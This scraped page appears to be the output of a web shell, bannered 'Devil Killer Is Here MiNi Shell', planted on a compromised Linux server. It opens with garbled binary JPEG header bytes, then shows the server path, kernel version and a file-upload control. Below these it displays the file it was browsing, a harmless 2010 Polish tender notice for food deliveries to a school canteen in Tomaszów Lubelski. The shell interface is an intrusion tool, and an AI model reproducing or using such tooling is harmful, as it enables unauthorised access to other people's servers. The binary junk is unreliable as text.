JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100805/239356-N-2010.html

<p class="kh_header"><b>Tomaszów Lubelski: SUKCESYWNA DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DLA ZESPOŁU SZKÓŁ NR 3 W TOMASZOWIE LUBELSKIM , UL. HALLERA 5</b><br>
<b>Numer ogłoszenia: 239356 - 2010; data zamieszczenia: 05.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół nr 3 im. Macieja Rataja , ul. Hallera 5, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6650505, faks 084 6650505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsnr3tomaszow.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNA DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DLA ZESPOŁU SZKÓŁ NR 3 W TOMASZOWIE LUBELSKIM , UL. HALLERA 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywna dostawa artykułów spożywczych dla stołówki szkolnej przy internacie Zespołu Szkół Nr 3 w Tomaszowie Lubelskim przy ul. Hallera 5
Przedmiot zamówienia został podzielony na 14 CZĘŚCI od nr I do XIV .
CZĘŚĆ I  	PIECZYWO		Kod CPV 15612500-6-6	
CZĘŚĆ II 	MLEKO I JEGO PRZETWORY kod CPV 15500000-3	
CZĘŚĆ III 	MIĘSO JADALNE  I SUROWCE RZEŹNEKod CPV 15100000-9
CZĘŚĆ IV 	WYROBY WĘDLINIARSKIE 	Kod CPV 15131120-2
CZĘŚĆ V  	RÓŻNE PRODUKTY SPOZYWCZE	Kod CPV 15800000-6
CZĘŚĆ VI 	RYBY PRZETWORZONE I KONSERWOWANEKod CPV 15200000-0
CZĘŚĆ VII 	DRÓB			Kod CPV 15112000- 6
CZĘŚĆ VIII 	MROŻONKI 		Kod CPV 15331100-8
CZĘŚĆ IX 	OWOCE  ŚWIEŻE	Kod CPV  03121000-5
CZĘŚĆ X 	WARZYWA 		Kod CPV 15300000-1 
CZĘŚĆ XI 	JAJA  KURZE		Kod CPV 03142500-3
CZĘŚĆ XII 	PRODUKTY MĄCZNE  GOTOWE	Kod CPV 15851000-8
CZĘŚĆ XIII 	MAKARONY			Kod CPV 15850000-1
CZĘŚC XIV        ZIEMNIAKI 			Kod CPV 03212100-1
Szczegółowy opis przedmiotu zamówienia  zawierają poszczególne części , które stanowią arkusze kalkulacyjne ofert jako załączniki niniejszej specyfikacji  nr :  2-1,2-2,2-3,2-4,2-5,2-6,2-7,2-8,2-9,2-10,2-11, 2-12,2-13, 2-14.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.61.25.00-6, 15.50.00.00-3, 15.10.00.00-9, 15.13.11.20-2, 15.80.00.00-6, 15.20.00.00-0, 15.11.20.00-6, 15.33.11.00-8, 03.12.10.00-5, 15.30.00.00-1, 03.14.25.00-3, 15.85.10.00-8, 15.85.00.00-1, 03.21.21.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie warunków udziału w postępowaniu   odbywać się będzie na postawie przedłożonych przez wykonawcę dokumentów i oświadczeń na zasadzie spełnia /nie spełnia/. Niespełnienie jednego warunku, skutkować  będzie wykluczeniem wykonawcy z postępowania. Z treści złożonych dokumentów musi jednoznacznie wynikać , iż wyżej wymienione warunki zostały spełnione przez wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsnr3tomaszow.internetdsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Nr 3 w Tomaszowie Lubelskim, ul. Hallera 5 
22-600 Tomaszów Lubelski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2010 godzina 11:00, miejsce: Zespół Szkół Nr 3 w Tomaszowie Lubelskim, ul. Hallera 5, 22-600 Tomaszów Lubelski
sekretariat szkoły parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb  zwykły  krojony    500 g	szt.	6500
Chleb razowy 500 g	szt.	350
Bułka 50 g	szt	10000
Bułka tarta	kg	120
Placek cebularz 100 g	szt.	140
Drożdżówka 100 g	szt.	1900
Pierożek z kaszą lub kapustą waga pierożka nie mniej jak 60g    	szt.	2200
Krokiety paszteciki nie mniejsze jak 50 g 	szt.	150
Pączki  60 g	szt.	400
Makowiec 500 g	Kg.	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MLEKO I JEGO PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mleko spożywcze 2%  tł. w opak. 1 l.litr	3000
2	Śmietana 18 % tł.   Litr	400 
4	Masło ex .zawartość tł. 82,5%     op. 0.200 g	szt	10 
5	Masło śmietankowe op. Nie mniej jak 200 g 	kg	90
6	Twaróg półtłusty Kg.	 250 
7	Ser topiony  100 g	Szt.	1600 
8	Ser  zółty   półtłusty	Kg.	200 
9	Jogurt  kubek  150 ml. 	Szt.	3000 
10	Serek homogenizowany op.100 g	Szt.	1000 
11	Ser żółty  salami 	Kg.	70 

11	Serek  wiejski Bieluch op. Nie mniej jak 150 g	szt	370.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MIĘSO JADALNE I SUROWCE RZEŹNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mięso mielone wieprzowo-wołowe	kg.	320
2	Mięso  wieprzowe gulaszowe  II kl. kg.	260 
5	Karkówka wieprzowa  z kością 	kg.	100 
6	Karkówka b/k	kg.	40 
7	Schab  wieprzowy z kością 	kg.	180
8	Schab  b/z kości 	kg.	50  
9	Wątroba wieprzowa	kg.	50 
10	Żeberka  wieprzowe Paski 	kg.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WYROBY WĘDLINIARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Boczek wędzony parzony	kg.	20 
2.	Baleron	kg.	25 
3.	Kiełbasa krakowska Parzona  	kg.	230
4.	Mielonka  przysmak-śniadaniowy	kg.	25 
5.	Kiełbasa zwyczajna	kg.	60 
6.	Kiełbasa łopatkowa	kg.	20 
7.	Kiełbasa wiejska 	kg.	50 
8.	Kiełbasa toruńska 	kg.	120
9.	Kiełbasa golonkowa	kg.	45 
10.	Kiełbasa żywiecka 	kg.	220 
11.	Kiełbasa szynkowa	kg	80
12.	Mielonka wieprz. Smaczek 	kg.	150 
13.	Ogonówka	kg.	310
14.	Paróweczki wieprzowe	kg.	180
15.	Mortadela 	kg.	25 
16.	Pieczeń rzymska 	kg.	130
17.	Pieczeń rzymska chlebowa 	kg	50
18.	Salceson ozorkowy 	kg.	40 
19.	Szynka wieprzowa domowa	kg.	80 
20.	Pasztetowa wiejska	kg.	20 
21.	Flaki wieprzowe odgotowane krojone 	kg.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Cukier biały kryształ- luzem a 50 kg	750	Kg
2.		Chrzan tarty w słoiku op.  Nie mniej jak  200 g	100	Szt
3.		Kakao ciemne sypkie  op. Nie mniej jak  100 g	70	Szt
4.		Dżem wiśniowy op.  nie mniej jak 280g	200	Szt
5.		Dżem  truskawkowy , op. nie mniej jak 
280 g	400	Szt
6.		Dżem  śliwkowy - nie mniej jak 280g	200	Szt
7.		Fasolka konserwowa czerwona op.nie mniejsze jak 400g	50	szt
8.		Groszek konserwowy  op. nie mniej jak 400 g  	190	Szt
9.		Gałka muszkatołowa mielona 20 g	10	Szt
10.		Herbata granulowana 100 g 	90	Szt
11.		Herbata liściasta op. 100 g	70	Op

12.		Kawa inka  op. nie mniejsze jak 150 g	45	Szt
13.		Keczup PIKANTNY firmy Roleski  lub inny równoważny op.nie mniej jak  500 g
	250	Szt

14.		Koncentrat pomidorowy 30 % 
op. Nie mniej jak 200g 	230	Szt
15.		Kukurydza konserwowa  słodka  op. nie mniejsze jak 400 g 	180	Szt
16.		Kwasek cytrynowy  op. Nie mniej jak 20g	90	Szt
17.		Majonez  dekoracyjny nie mniej 
 jak 700 g  Firmy Winiary
lub inny równoważny	130	Szt
18.		Musztarda  kremska  op. nie mniej 180g	130	Szt
19.		Majeranek  torebka  op. 20g	90	Szt
20.		Miód naturalny wielokwiatowy op. słoik  1300 kg	5	Szt
21.		Miód naturalny wielokwiatowy nie mniej jak  410 g	10
	Szt
22.		Ocet  spirytusowy 10 %  op. 05 l. 	15	Szt
23.		Przyprawa do zup w płynie  op. - 1 l  Firmy Winiar lub inny  równoważny 	130	Szt
24.		Pieprz naturalny czarny mielony 
Op.nie mniej jak 20g 	250 
	Szt
25.		Pieprz ziołowy  torebka  op. 20 g	20	Szt
26.		Papryka w proszku słodka mielona 
Op. nie mniej jak 20 g	200	Szt
27.		Pietruszka susz  natka op nie mniej jak 20g 	190	Szt
28.		Koper susz nać  op. nie mniej jak 20 g
	110	Szt
29.		Przyprawa do potraw typu Vegeta lub inny równoważny op.200 g	180	Szt
30.		Ryż biały  op. 1 kg	90	Kg
31.		Rosołki drobiowe op. 180 g 
Firmy Winiar lub równoważny	220	Op
32.		Sól kuchenna  spożywcza 	150	Kg
33.		Ziele angielskie torebka 15g	10	Szt
34.		Liść laurowy  torebka 15 g	15	Szt
35.		Mąka ziemniaczana  op. 1000 g	25	Kg
36.		Mąka pszenna  luksusowa  typ 550  	350	Kg
37.		Olej  jadalny uniwersalny  op. 1 litr	350	Szt
38.		Olej słonecznikowy 1 l.	80	Szt

39.		Margaryna mas mix op. 500 g	40	Szt
40.		Margaryna  śniadaniowa z zaw. Olejów roślinnych op. 500 g	800	Szt
41.		Kasza jęczmienna  wiejska op.1000g	35	Kg
42.		Kasza gryczana  op. 1000 g	60	Kg
43.		Płatki kukurydziane  zwykłe op. Nie mniej jak 425 g	100	Szt.
44.		 Płatki kukurydziane zwykłe op.1000g 
	50	szt
45.		Ogórek konserwowy  poj. 0.9 l	190	Szt
46.		Papryka konserwowa poj. 0,9 l 	150	Szt

47.		Serek top. Krążki  op. 200 g
	470	szt
48.		Serek top. plastry op. 150g
	620	Szt
49.		Szyneczka wieprzowa  nie mniej jak 
 op. 135g	70	Szt
50.		Szyneczka  wieprzowa nie mniej jak  op. 110g	600	Szt
51.		Pasztet drobiowy  nie mniej jak op. 135g 	70	Szt
52.		Delikat do mięs op. 700 g	5	Szt

53.		Delikat do ryb op. 700g	2	Szt

54.		Delikat do drobiu op. 700 g	6 	Szt

55.		Sos sałatkowy ogrodowy op.700 g	11	Szt

56.		Baton Snikers lub inny równoważny op. nie mniejsze jak 50 g	600	Szt
57.		Wafelki  ciastka op. 300 g	300
	Szt
58.		Ciastka delicje op. nie mniej jak 140 g	90	Op

59.		Ciastka  pierniczki luz 	10	Kg 

60.		Wafelek prinncessa 
op. nie mniej jak 49 g	100
	szt
61.		Cukierki czekoladowe  Wedell luz lub inne równoważne 	10	Kg
78	Czekolada Wedell  lub inna równoważna  op. 100 g	400	Szt

79	Ptasie mleczko op. Nie mniej jak 500 g	100	Szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> RYBY PRZETWORZONE I KONSRWOWANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z ryby mrożony morszczuk SHP 	Kg 	160
2	Filet śledziowy b/skóry w oleju  op. 4 kg 	kg	80
3	Makrela wędzona 	Kg	40
4	Konserwa rybna szprot w oleju  op. nie mniej jak   170 g	Szt	170
5	Konserwa rybna szprot w pomidorach op. nie mniej jak 170 gSzt	230 
6	Paprykarz szczeciński - op. nie mniej jak 170 g	Szt	230
7	Paprykarz szczeciński op. 300 g	szt	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet drobiowy  mrożony 	kg.	340 
2	Porcje rosołowe	kg.	140
3	Mięso drobiowo  gulaszowe kg.	230
4	Ćwiartka kurczaka  mrożona  	kg.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mieszanka wielo warzywna mrożona  Op.2,5 kg	Op	40 
2	Kalafior mrożony  Op. 2.50 kg	Op.	40 
3	Szpinak mrożony op. 2,5kg	op	20 
4	Pyzy ziemniaczane mrożone op. nie mniej jak 500g	 op	40
5	Pyzy ziemniaczane  op. Nie mniej jak 900 g	op	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> OWOCE ŚWIEŻE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jabłka  gat. I 	kg	1200 
2	Gruszka  	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> WARZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Burak ćwikła 	kg.	300
2	Cebula  biała	kg.	350
3	marchew	kg.	600
4	seler  korzeń  	kg.	10
5	por 	kg.	20
6	Pietruszka korzeń 	kg.	15
7	Kapusta czerwona	kg.	65
8	Kapusta biała 	kg.	650
9	Kapusta włoska 	kg.	90
10	Kapusta pekińska	kg.	250
11	Kapusta kiszona	kg.	200
12	Ogórek kwaszony 	kg.	130
13	Fasola biała Jaś	kg.	40
14	Fasolka drobna biała	Kg 	25
15	Groch  łupany   	kg.	20
16	Czosnek 	kg.	20
